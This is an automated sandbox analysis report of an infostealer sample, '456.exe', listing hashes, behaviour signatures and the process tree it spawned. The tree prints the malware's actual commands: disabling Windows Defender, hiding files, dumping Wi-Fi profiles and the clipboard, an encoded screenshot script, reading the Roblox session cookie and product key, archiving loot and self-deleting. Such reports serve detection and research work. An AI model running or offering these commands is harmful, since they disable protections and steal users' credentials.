Analysis

  • max time kernel
    94s
  • max time network
    95s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-10-2024 02:01

General

  • Target

    456.exe

  • Size

    50.0MB

  • MD5

    3bb811b851c4ea7b12be70fd1a47b2a2

  • SHA1

    d8e6c24f5f5e06dbb15dfcdb548354807c349d50

  • SHA256

    dfe28651a1e845e1323ed61067065be56a9eb3244ec76f1a013c018c2515f4aa

  • SHA512

    d49d2ba89a191d3eaffbf2c42780790f8e4f0c854fdfffd99e6028de192eccbd2dd63b1ed17d86a61cb69df1c8149e3d1b61c5d1644e0787e1ed61709386f76e

  • SSDEEP

    98304:r2frAEHhCgAi65sn6Wfz7pnxCb3AtZC0VZHtKpbzL8SG2XATHSm9ok6n9YbsHQ:rCrAESDOYbwtZVZibPpG2QrSso5nGsw

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • UPX packed file 58 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\456.exe
    "C:\Users\Admin\AppData\Local\Temp\456.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4468
    • C:\Users\Admin\AppData\Local\Temp\456.exe
      "C:\Users\Admin\AppData\Local\Temp\456.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2088
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\456.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4404
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\456.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:864
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2028
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:980
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\456.exe""
        3⤵
        • Hide Artifacts: Hidden Files and Directories
        • Suspicious use of WriteProcessMemory
        PID:1240
        • C:\Windows\system32\attrib.exe
          attrib +h +s "C:\Users\Admin\AppData\Local\Temp\456.exe"
          4⤵
          • Views/modifies file attributes
          PID:3172
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4580
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:2428
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2596
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:5020
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1776
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4304
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Clipboard Data
        • Suspicious use of WriteProcessMemory
        PID:4660
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Clipboard Data
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4840
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4792
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4964
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1592
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:1428
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • System Network Configuration Discovery: Wi-Fi Discovery
          • Suspicious use of WriteProcessMemory
          PID:4716
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:2476
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "systeminfo"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5096
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            4⤵
            • Gathers system information
            PID:4932
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:428
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4504
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1noejva2\1noejva2.cmdline"
              5⤵
                PID:804
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES952B.tmp" "c:\Users\Admin\AppData\Local\Temp\1noejva2\CSCA8CA070A215547229AE99746B93847E.TMP"
                  6⤵
                    PID:3984
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3916
              • C:\Windows\system32\tree.com
                tree /A /F
                4⤵
                  PID:2132
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4296
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:3692
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:116
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:1968
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                      PID:1900
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        4⤵
                          PID:1560
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                        3⤵
                          PID:1336
                          • C:\Windows\system32\tree.com
                            tree /A /F
                            4⤵
                              PID:2516
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                            3⤵
                              PID:4732
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2736
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                              3⤵
                                PID:4856
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                  4⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3636
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "getmac"
                                3⤵
                                  PID:4276
                                  • C:\Windows\System32\Conhost.exe
                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    4⤵
                                      PID:2516
                                    • C:\Windows\system32\getmac.exe
                                      getmac
                                      4⤵
                                        PID:1064
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI44682\rar.exe a -r -hp"luqui12345" "C:\Users\Admin\AppData\Local\Temp\XnBtM.zip" *"
                                      3⤵
                                        PID:876
                                        • C:\Users\Admin\AppData\Local\Temp\_MEI44682\rar.exe
                                          C:\Users\Admin\AppData\Local\Temp\_MEI44682\rar.exe a -r -hp"luqui12345" "C:\Users\Admin\AppData\Local\Temp\XnBtM.zip" *
                                          4⤵
                                          • Executes dropped EXE
                                          PID:1680
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                        3⤵
                                          PID:4564
                                          • C:\Windows\System32\Wbem\WMIC.exe
                                            wmic os get Caption
                                            4⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:812
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                          3⤵
                                            PID:1628
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic computersystem get totalphysicalmemory
                                              4⤵
                                                PID:3956
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                              3⤵
                                                PID:4280
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic csproduct get uuid
                                                  4⤵
                                                    PID:4352
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                  3⤵
                                                    PID:2308
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                      4⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:3160
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                    3⤵
                                                      PID:4224
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic path win32_VideoController get name
                                                        4⤵
                                                        • Detects videocard installed
                                                        PID:5024
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                      3⤵
                                                        PID:3916
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                          4⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:4204
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\456.exe""
                                                        3⤵
                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                        PID:2972
                                                        • C:\Windows\system32\PING.EXE
                                                          ping localhost -n 3
                                                          4⤵
                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                          • Runs ping.exe
                                                          PID:3240
                                                  • C:\Windows\System32\Conhost.exe
                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    1⤵
                                                      PID:1560

                                                    Network

                                                    MITRE ATT&CK Enterprise v15

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                      Filesize

                                                      2KB

                                                      MD5

                                                      d85ba6ff808d9e5444a4b369f5bc2730

                                                      SHA1

                                                      31aa9d96590fff6981b315e0b391b575e4c0804a

                                                      SHA256

                                                      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                      SHA512

                                                      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Filesize

                                                      944B

                                                      MD5

                                                      cadef9abd087803c630df65264a6c81c

                                                      SHA1

                                                      babbf3636c347c8727c35f3eef2ee643dbcc4bd2

                                                      SHA256

                                                      cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

                                                      SHA512

